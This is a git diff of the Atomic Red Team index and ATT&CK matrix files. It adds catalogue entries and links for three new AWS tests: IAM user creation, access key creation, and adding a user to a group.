a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index 0e0f2184..31e71a51 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -151,10 +151,13 @@ discovery,T1082,System Information Discovery,11,Environment variables discovery discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh +persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh +persistence,T1098.001,Additional Cloud Credentials,1,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual +persistence,T1136.003,Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 19dec5dc..1fa4db89 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -847,10 +847,12 @@ - [T1098 Account Manipulation](../../T1098/T1098.md) - Atomic Test #1: Admin Account Manipulate [windows] - Atomic Test #2: Domain Account and Group Manipulate [windows] + - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws] - T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md) + - Atomic Test #1: AWS - Create Access Key and Secret Key [iaas:aws] - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md) - Atomic Test #1: Install AppInit Shim [windows] @@ -882,7 +884,8 @@ - Atomic Test #3: Registry-free process scope COR_PROFILER [windows] - [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md) - Atomic Test #1: Change Default File Association [windows] -- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1136.003 Cloud Account](../../T1136.003/T1136.003.md) + - Atomic Test #1: AWS - Create a new IAM user [iaas:aws] - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 957af315..64db3fe8 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -406,10 +406,12 @@ - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) # persistence -- T1098 Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1098 Account Manipulation](../../T1098/T1098.md) + - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws] - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md) + - Atomic Test #1: AWS - Create Access Key and Secret Key [iaas:aws] - [T1053.001 At (Linux)](../../T1053.001/T1053.001.md) - Atomic Test #1: At - Schedule a job [linux] - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -419,7 +421,8 @@ - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos] - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos] - Atomic Test #3: Firefox [linux, windows, macos] -- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1136.003 Cloud Account](../../T1136.003/T1136.003.md) + - Atomic Test #1: AWS - Create a new IAM user [iaas:aws] - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md index e55aedd3..453f1a9f 100644 --- a/atomics/Indexes/Matrices/linux-matrix.md +++ b/atomics/Indexes/Matrices/linux-matrix.md @@ -1,16 +1,16 @@ # Linux Atomic Tests by ATT&CK Tactic & Technique | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact | |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| -| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Account Manipulation](../../T1098/T1098.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | +| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | [At (Linux)](../../T1053.001/T1053.001.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) | | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Clear Command History](../../T1070.003/T1070.003.md) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cloud Account](../../T1136.003/T1136.003.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index d6aa3ef7..06b1e02f 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md @@ -6,7 +6,7 @@ | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | | [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) | -| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [External Remote Services](../../T1133/T1133.md) | [Cron](../../T1053.003/T1053.003.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | @@ -20,7 +20,7 @@ | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | [Software Deployment Tools](../../T1072/T1072.md) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A 